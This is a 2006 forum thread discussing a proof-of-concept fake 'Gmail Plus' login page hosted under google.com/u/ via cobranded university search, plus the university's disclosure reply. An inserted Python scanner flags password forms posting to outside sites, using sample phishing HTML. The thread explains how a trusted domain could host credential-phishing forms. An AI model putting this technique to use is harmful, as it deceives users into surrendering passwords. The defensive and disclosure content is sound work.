Google exploit
September 15, 2006 3:52 AM
Can someone explain to me what this: http://www.google.com/u/gplus is all about? How is it done? Hint: you may not want to enter your real Google login details into the form.
This popped up on del.icio.us today. I'm trying to work out how someone scored a google.com/* address to run fake password-grabbing login page on. What's the trick?
Response by poster: Well, because I doubt it's official Google corporate policy to set up a page claiming to be offering a "Limited Beta of Gmail Plus!" that sends you off to a remote domain that tells you the password you typed in.
posted by Jimbob at 4:23 AM on September 15, 2006
Ah, ok. I entered jimbob/wtf for the username/pwd, and got back
You (could have) gotten served! The URL in the address bar is http://www.monthsbehind.net/google.php
jimbob = username you entered
wtf = password you entered
No data was actually taken, just displayed to you :) This is just a proof of concept of what a malicious user could do with this exploit.
posted by gleuschk at 4:26 AM on September 15, 2006
So to repeat JBs question, wtf is going on?
posted by wilful at 4:34 AM on September 15, 2006 [1 favorite]
That is really bizarre. It is not character spoofing because the trick still works if one types the URL into the address bar. The monthsbehind.com root directory is not helpful at all. Is this a prank by an internal Google employee?
posted by pheideaux at 4:39 AM on September 15, 2006
Usually in situations like this, I blame the interns.
posted by jessamyn at 4:43 AM on September 15, 2006 [1 favorite]
You can see the same effect with other pages under the u directory like this: Electronic visualization lab. This page Cobranded University Search seems to shed some light on to it. It's their university offering.
posted by jessamyn at 4:46 AM on September 15, 2006
Right, ucdavis.edu is mentioned in the source of the dodgy page.
posted by edd at 4:50 AM on September 15, 2006
The google /u/ pages are custom search pages for various organizations, especially universities and schools:
Google's own example.
The schools have total control over the content of those pages, so they can easily perform a hack like the gmailplus one. I'm glad someone demonstrated this exploit.
posted by jedrek at 4:52 AM on September 15, 2006
More here, here, here and a description of other schools in the program here, though gplus is not on the list.
posted by jessamyn at 4:52 AM on September 15, 2006
I'm not sure exactly what's going on here, and I suspect Google will take it down shortly.
Basically: google.com/u contains various legit Google pages.
For example, try /blah, /test or /2. The /test one mentions cobranded university search. Perhaps a mischievous university employee has access to upload a page to /gplus?
posted by matthewr at 4:55 AM on September 15, 2006
Whoa, I need to refresh more often and use preview.
posted by matthewr at 4:55 AM on September 15, 2006
I sent an email to the guy who has the monthsbehind domain registered to let him know that the link to that page is now out in the wild. His info is easy to find on whois, so this was probably some sort of example page and not an intentional nefarious hack.
posted by jessamyn at 5:03 AM on September 15, 2006
Response by poster: I sent an email to the guy who has the domain registered to let him know that the link to that page is now out in the wild.
Heh, I wanted answers not action..! I guess this was all a lot simpler than I thought...
posted by Jimbob at 5:04 AM on September 15, 2006
Best answer: Here's a link to the guy who uncovered it as a potential phishing loophole.
posted by peacay at 5:07 AM on September 15, 2006
Response by poster: Ah ha, now I get it, thanks to Peacay.
Google offers a service for universities to "brand" Google search by specifying their own header and footer.
This makes it possible, if you get onto that service, to insert a "header" and "footer" that makes the page look like a Gmail login, giving you your own google.com URL with a password form that can send the data to whatever site you like.
And they would have got away with it, too, if it wasn't for us darned kids!
posted by Jimbob at 5:14 AM on September 15, 2006
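The mechanism the poster sums up above (trusted host, third-party page content, password form posting to an outside origin) is exactly the pattern a defensive scanner can look for: a password field inside a form whose resolved action points to a different site than the page itself. The following is an added example, not code from this thread, from Google or from the UC Davis researcher. It uses only the Python standard library; the HTML it scans is a constructed sample modelled on the thread's description, and the base-domain comparison is a deliberate simplification (last two host labels, no public-suffix list).

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class CredentialFormScanner(HTMLParser):
    """Collect every <form> that contains an <input type="password">,
    together with the absolute URL its action attribute resolves to."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self._current = None
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative or missing action posts back to the page's own URL,
            # so resolve it against the page before comparing hosts.
            action = urljoin(self.page_url, a.get("action") or "")
            self._current = {"action": action, "has_password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def base_domain(url):
    """Lower-cased host reduced to its last two labels.
    Simplification: a real scanner would consult the public suffix list."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def find_offsite_credential_forms(page_url, html):
    """Return one finding per password form whose action leaves the page's site."""
    scanner = CredentialFormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    page_site = base_domain(page_url)
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        target_site = base_domain(form["action"])
        if target_site != page_site:
            findings.append(
                {"page_site": page_site, "action": form["action"], "action_site": target_site}
            )
    return findings


# Constructed sample: a cobranded header dressed up as a "Gmail Plus" login,
# posting to the third-party URL named in the thread, plus two benign forms.
SAMPLE_PAGE_URL = "http://www.google.com/u/gplus"
SAMPLE_HTML = """
<html><body>
<h1>Limited Beta of Gmail Plus!</h1>
<form method="post" action="http://www.monthsbehind.net/google.php">
  Username: <input type="text" name="username">
  Password: <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<!-- same-site login: different subdomain, same base domain, not flagged -->
<form method="post" action="https://accounts.google.com/signin">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<!-- plain search box: no password field, not flagged -->
<form action="/u/gplus">
  <input type="text" name="q"><input type="submit" value="Search">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_offsite_credential_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("password form on %(page_site)s posts to %(action)s (%(action_site)s)" % finding)
```

Only the first form is reported: the second keeps credentials within google.com, and the third has no password field. A browser heuristic of the kind that made Firefox 2 warn about the page (mentioned further down the thread) works on the same signal, and a site that lets partners inject markup into its pages can run this check server-side over submitted headers and footers before publishing them.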
Firefox 2 considers that link to be a phishing attempt.
posted by Coda at 5:56 PM on September 15, 2006
Yeah, I get a pop up warning me not to use the page at all. <3 Firefox.
posted by Salmonberry at 2:16 PM on September 16, 2006
I got an email back from the UC Davis people:
Dear Ms. West
We appreciate your concern and you taking the time to contact us.
One of our programming students, Eric Farraro, discovered a security issue
for Google, on their military and university local search engine software,
which actually creates a security risk to Google servers and not the
military/university site.
He ran a legitimate test site to prove his point, under the guidance of his
supervisor, Charlie Turner. When he had proof, he contacted Google, who
immediately took down the specific functionality while they fix the bug.
(It is still down). Eric's site did not actually do any "phishing" - it
strictly returned the information to the person originating the login, to
let them know that had it been a real phishing site, their information would
have been taken and used without their knowledge.
His discovery will certainly save millions from a potentially huge
"phishing" exploit, as any phishing done using this security breach would be
using google's name as a "www.google.com/u/[put whatever you want here] URL
- which of course would be considered a trusted source by many.
Therefore, rest assured that this site was created with both the knowledge
of his supervisor and now of Google - who is working to correct the security
breach that Eric discovered.
Once again, thank-you very much for your inquiry.
Sincerely
Liz Gibson
posted by jessamyn at 7:13 PM on September 17, 2006
posted by gleuschk at 4:21 AM on September 15, 2006